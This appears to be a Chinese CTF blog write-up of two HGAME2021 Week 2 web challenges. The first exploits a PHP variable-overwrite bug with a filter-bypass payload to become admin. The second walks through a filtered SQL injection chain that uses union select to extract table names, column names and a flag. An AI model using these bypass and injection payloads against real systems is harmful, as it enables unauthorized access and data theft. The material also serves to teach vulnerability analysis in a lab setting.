HGAME2021 Week2 Web wp

已于 2022-01-23 11:43:48 修改
阅读量475 收藏 1
点赞数
分类专栏: CTF 文章标签: php
于 2021-02-15 16:07:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46270220/article/details/113816116
版权

文章目录

LazyDogR4U

进链接后发现是一个登录界面,因为东方明珠塔警告,先试试常见路径www.zip/www.rar,发现www.zip能获得网站源码
在这里插入图片描述
先看index.php

<?php
session_start();

require_once "lazy.php";

if(isset($_SESSION['username'])){
    header("Location: flag.php");
    exit();
}else{
    if(isset($username) && isset($password)){
        if((new User())->login($username, $password)){
            header("Location: flag.php");
            exit();
        }else{
            echo "<script>alert('食人的魔鬼尝试着向答案进发。')</script>";
        }
    }
}

就是包含lazy.php,并将输入的username和password与存储的进行比较,如果正确就转向flag.php,错误就弹窗。
再看lazy.php

<?php
$filter = ["SESSION", "SEVER", "COOKIE", "GLOBALS"];

// 直接注册所有变量,这样我就能少打字力,芜湖~

foreach(array('_GET','_POST') as $_request){
    foreach ($$_request as $_k => $_v){
        foreach ($filter as $youBadBad){
            $_k = str_replace($youBadBad, '', $_k);
        }
        ${$_k} = $_v;
    }
}


// 自动加载类,这样我也能少打字力,芜湖~
function auto($class_name){
    require_once $class_name . ".php";
}
spl_autoload_register('auto');

这里因为$$的使用不当,是存在一个变量覆盖的漏洞的。
再看flag.php

<?php

    if($_SESSION['username'] === 'admin'){
        echo "<h3 style='color: white'>admin将于今日获取自己忠实的flag</h3>";
        echo "<h3 style='color: white'>$flag</h3>";
    }else{
        if($submit == "getflag"){
            echo "<h3 style='color: white'>{$_SESSION['username']}接近了问题的终点</h3>";
        }else{
            echo "<h3 style='color: white'>篡位者占领了神圣的页面</h3>";
        }
    }
        ?>

可以看到,必须要让SESSION[username]的值为admin,才能得到flag,因为上面提到的变量覆盖漏洞,可以用GET传参,让它的值为admin

然后看config.ini和user.php

<?php
class User
{

    function login($username, $password){
        if(session_status() == 1){
            session_start();
        }
        $userList = $this->getUsersList();
        if(array_key_exists($username, $userList)){
            if(md5($password) == $userList[$username]['pass_md5']){
                $_SESSION['username'] = $username;
                return true;
            }else{
                return false;
            }
        }
        return false;
    }

    function logout(){
        unset($_SESSION['username']);
        session_destroy();
    }

    private function getUsersList(){
        return Config::getAllUsers();
    }
}

user.php中,在验证登录时,先验证password的md5加密后是否相等,再根据登录的SESSION[username]来判断是哪个账户登录的,由于这里是==,可以联想到php md5弱比较(实际不是)。

[global]
debug = true

[admin]
username = admin
pass_md5 = b02d455009d3cf71951ba28058b2e615

[testuser]
username = testuser
pass_md5 = 0e114902927253523756713132279690

最后看config.ini,里面有admin和testuser的password的md5值,这里testuser确实是0e开头,但是是没用的账户,必须要用admin账户登录才能获得flag,但admin的password的md5值是无法解密出来的,这时就需要用到上面说到的变量覆盖漏洞了。

在flag.php中,当SESSION[username]=admin时就能登录成功,但是,lazy.php中有一个waf,能将SESSION自动替换为空,那么可以用双写的办法来绕过

payload:

/flag.php?_SESSESSIONSION[username]=admin

200OK!!

点进链接会发现只有一个reload按钮可以让上面的字随意切换,题中所给的hint说status 字段会有什么坏心思呢?,那么可以先抓一个包,看看包中的内容
在这里插入图片描述
在这个http包中可以看到有一个status,这个是平时的包中不存在的东西,重新抓一次包,发现两次status的值不一样,再加上题中另一个提示:这些字符串存在哪里呢?变量?还是...?推测是存在数据库中,进而猜测这题是要sql注入

1' and 1=1-- -测试,发现无回显,猜测是过滤了一些字符,经过测试,先过滤了空格、替换and,替换and可以用大小写绕过

payload:

1'/**/And/**/1=1#
1'/**/order/**/by/**/1#    //只有一个栏目
-1'/**/Union/**/Select/**/1#    //大写union和select绕过
-1'/**/Union/**/Select/**/database()#    //库名为week2sqli
-1'/**/Union/**/Select/**/group_concat(table_name)/**/fRom/**/infOrmation_schEma.tAbles/**/Where/**/Table_Schema='week2sqli'#    //过滤的关键字太多,所以全部大写来绕过,表名为f1111111144444444444g
-1'/**/Union/**/Select/**/group_concat(column_name)/**/fRom/**/infOrmation_schEma.columns/**/Where/**/Table_name='f1111111144444444444g'#    //列名为ffffff14gggggg
 -1'/**/Union/**/Select/**/group_concat(ffffff14gggggg)/**/fRom/**/f1111111144444444444g#

最终得到flag:hgame{Con9raTu1ati0n5+yoU_FXXK~Up-tH3,5Q1!!=)}

总结

这两题都不算难,但是自己就是没做的出来,第一题是因为不知道在GET中传SESSION的参数,第二题是因为脑洞不够大,做题经验太少,没想到status中可以进行sql注入(看做出来的人那么少,估计都是和我一样的情况)。还是需要多做题,多学习吧。

Lum1n0us
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
HGAME2021-week2-wp
qq_50438521的博客
02-14 2321
HGAME2021-week2-wp 1.Telegraph:1601 6639 3459 3134 0892 描述: 他曾经最喜欢的曲师写的曲子,让人犹如漫步在星空之下,可如今他听见只觉得反胃。 由于文件名过长,单独给出附件的md5: E5C3EE3F441B860B07A3ADCD98BFFC00 请将flag以hgame{your_flag_here}形式提交,flag为全大写。 题目地址 https://1.oss.hgame2021.vidar.club/Telegraph%EF%BC%9A16
HGAME 2024 WEEK2 Web方向题解 全
最新发布
Jay17的博客
02-14 1707
HGAME 2024 WEEK2 Web方向题解 全
hgame2023-week2
247533的博客
01-20 990
hgame week2
hgame2022-week2-wp
网安小菜鸡
01-22 802
hgame-wp
HGame 2023 Week1 部分Writeup
vvbbnn00的专栏
01-17 2154
第一周的大部分题目难度较低,不过也存在一部分难题,解这些题目的过程也是一个很好的学习机会(虽然最后还是没解出来)下面是我的题解。
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
HGAME cdcollector-开源
04-24
这是现有项目cdcollector的mod,用于为拥有过多数据库的人使用phpmysql存储您的HGAMES数据库。
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
单表替换密码算法破解工具
01-15
网络密码中介绍的基本加密方法,与凯撒密码相似,该软件提供基本的替换功能
2022hgame-week1 wp
Anton1a的博客
01-28 1725
记录一下hgame比赛。 WEB easy_auth 打开题目是一个登录框 题目描述里有admin,那就随便输个弱口令抓包看一下 看见返回包有这个,就想到这个题肯定考察js,为验证一下想法看一下源代码,里面存在login.js打开看一下发现确实是前端验证的 之后就注册一个账号登录看一下登录成功的返回包 登录成功返回的结果如下: {"code":2000,"message":"success","count":0,"data":[{"token":"eyJ...
Hgame2021,web,week1
Holl0w_By的博客
02-21 501
HGAME2021,week1,web总结: 之前耽误了一段时间,现在才开始写wp。总之,果然还是实战比较管用。 1、Hitchhiking_in_the_Galaxy 这个题一进界面就有一个大大的404,只有一个链接可以点。点了之后又会回到index.php页面,这个时候就应该使用burpsuite来对该链接进行拦截和重定向。 发包后看见了一个提示: 上面提示说顺风车不是这么搭的,有一个405,这个状态码表示指定的URL不支持请求中所使用的方法。 一般来说,常用的请求方法就是GET和POST,这个时候就
[杭电Hgame]2021web week2(变量覆盖+多线程条件竞争+sql注入)
Huamang的博客
02-15 498
LazyDogR4U 考察变量覆盖,这篇博客写的很详细 首先是源码泄露,www.zip就可以拿到网站文件 代码审计 如果$_SESSION['username'] === 'admin'就会给flag if($_SESSION['username'] === 'admin'){ echo "<h3 style='color: white'>admin将于今日获取自己忠实的flag</h3>"; echo "<h3 style='color: wh
hgame2021 week2 pwn刷题
qq_45595732的博客
02-14 404
rop_primary 矩阵相乘,算法分析用过numpy就直接调用numpy现有的库了,常规栈溢出,但是不知道为什么system的系统调用貌似被禁用了,所以用了orw,没拿shell from pwn import* import numpy as np from LibcSearcher import* context.log_level = 'debug' def pr(a,addr): log.success(a+'====>'+hex(addr)) elf = ELF('./rop_prim
Hgame
忙碌者的博客
02-06 5185
Hgame WEEK1 1.换头大作战 题目地址 题目首先是这样一个界面,既然让我提交,那自然要提交试试,随便填个1进去提交试试。 提交完提示: request method is error.I think POST is better 既然让我POST,果断调出HACKBAR,同时注意到url后面多了个want变量,自然想到去POST这个want。 构造want=1,RUN,得到下图:需要lo...
HGAME 2019 WEB week2
stepone4ward的博客
02-27 829
1.easy_php 题目的标题给出了提示,查看robots.txt。 再查看http://118.24.25.25:9999/easyphp/img/index.php,得到源码。 由题目可知$img = $_GET['img'],我们需要传入一个名为img的变量,其中$img = str_replace('../', '', $img),会将$img中的../替换为空,这种替换方式可以用...
hgame-2018 CTFwp(杭电信安)week2
苟有恒,必有三更眠,五更起。
03-04 770
草莓社区-1 描述 flag在../flag.php中 知识点:LFI URL http://118.25.18.223:10011/ 基准分数 100 当前分数 100 完成人数 118 提示很清楚,简单的本地包含: payload: http://118.25.18.223:10011/show_maopian.php?mao=../flag.ph
hgameweek2-wp
wuerror的博客
02-23 639
week2-wp wuerror web easy php 使用…/./来绕过 str_replace(`'../', '', $img`) ?img=…/./flag可以得到回显maybe_you_should_think_think 再想想,试试伪协议读取文件看看 伪协议:?img=php://filter/read=convert.base64-encode/resource=…/...
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加...folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lum1n0us

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值